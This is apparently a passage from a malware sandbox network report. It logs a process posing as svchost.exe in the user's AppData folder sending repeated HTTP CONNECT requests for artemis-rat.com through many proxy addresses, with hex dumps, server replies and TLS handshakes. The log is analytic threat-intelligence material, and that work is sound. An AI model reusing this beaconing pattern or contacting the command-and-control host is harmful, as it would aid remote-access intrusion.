                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2970192.168.2.559690104.21.66.1848043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.734441996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.888814926 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:32 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2971192.168.2.559669162.159.242.1098043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.734441996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.897368908 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:32 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2972192.168.2.559691104.23.107.1728043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.739305019 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.893975973 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:32 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2973192.168.2.55727351.15.210.791637943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.742451906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.442588091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.349536896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.146413088 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2974192.168.2.559533103.49.202.2528043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.747858047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2975192.168.2.559713192.154.246.96900043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.785022974 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2976192.168.2.559734172.67.14.2378043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.785037994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.941163063 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:32 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2977192.168.2.559719162.159.250.1458043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.785187006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.946604967 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:32 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2978192.168.2.557270195.248.243.149723743312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.785219908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.645728111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.645942926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.646136999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2979192.168.2.559614218.252.244.1268043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.785315990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2980192.168.2.559761185.162.229.708043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.789104939 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.944251060 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:32 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2981192.168.2.55960418.228.198.1648043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.789166927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.115971088 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:32 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0
                                                                                    Mar 9, 2024 13:14:33.148246050 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ec 52 a7 04 d0 d9 c7 b9 1e 5a b5 06 3b d6 a3 85 b3 84 49 38 46 ad 7d 65 b9 38 16 95 4e f2 20 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                    Data Ascii: eRZ;I8F}e8N *,+0/$#('=<5/Uartemis-rat.com#
                                                                                    Mar 9, 2024 13:14:33.974044085 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ec 52 a7 04 d0 d9 c7 b9 1e 5a b5 06 3b d6 a3 85 b3 84 49 38 46 ad 7d 65 b9 38 16 95 4e f2 20 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                    Data Ascii: eRZ;I8F}e8N *,+0/$#('=<5/Uartemis-rat.com#
                                                                                    Mar 9, 2024 13:14:33.975414038 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:32 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0
                                                                                    Mar 9, 2024 13:14:34.304022074 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 81 72 ab 4f 1c 75 48 6f da 24 c5 29 11 da e5 54 c0 df 57 81 5c b4 4e 39 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                                                                                    Data Ascii: =9rOuHo$)TW\N9DOWNGRD0000*H010Uartemis-rat.com0240309121340Z260309121340Z010Uartemis-rat.com0"0*H0Z~fVz'
                                                                                    Mar 9, 2024 13:14:34.333460093 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 b8 c5 7c fd 27 24 74 68 74 44 83 06 65 e0 43 11 f8 d3 70 e8 64 7a 5f 1d b6 b3 48 e5 1d b5 81 7b 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 11 33 5e 99 af 61 1e af 43 f3 2f 48 a7 38 a7 c9 03 d9 5b 1d 2a
                                                                                    Data Ascii: %! |'$thtDeCpdz_H{(3^aC/H8[*Z!B0`P
                                                                                    Mar 9, 2024 13:14:34.658130884 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 5c 96 41 03 71 d5 e3 ec 6c 08 bb 8f 5e 6a 9d 79 40 37 b0 d6 99 0a 87 a8 08 2e 2f 3b 3e 1a b8 93 06 12 a3 cd 4f 23 54 58
                                                                                    Data Ascii: (\Aql^jy@7./;>O#TX


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2982192.168.2.559036142.44.210.1748043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.789166927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.802232027 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2983192.168.2.559783104.18.20.1608043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.790462017 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:32.944706917 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:32 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2984192.168.2.559570202.150.1.878043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.794612885 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2985192.168.2.558900122.114.232.13780843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.794619083 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2986192.168.2.559576202.162.219.10108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.804819107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2987192.168.2.559611103.166.141.742007443312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.805967093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2988192.168.2.559577103.231.78.368043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.811484098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2989192.168.2.55956313.234.24.116108043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.817332983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.677234888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:34.077541113 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:33 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2990192.168.2.559143104.18.136.288043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:32.817339897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.333595037 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:33.494658947 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:33 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2991192.168.2.559573139.129.202.2448043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
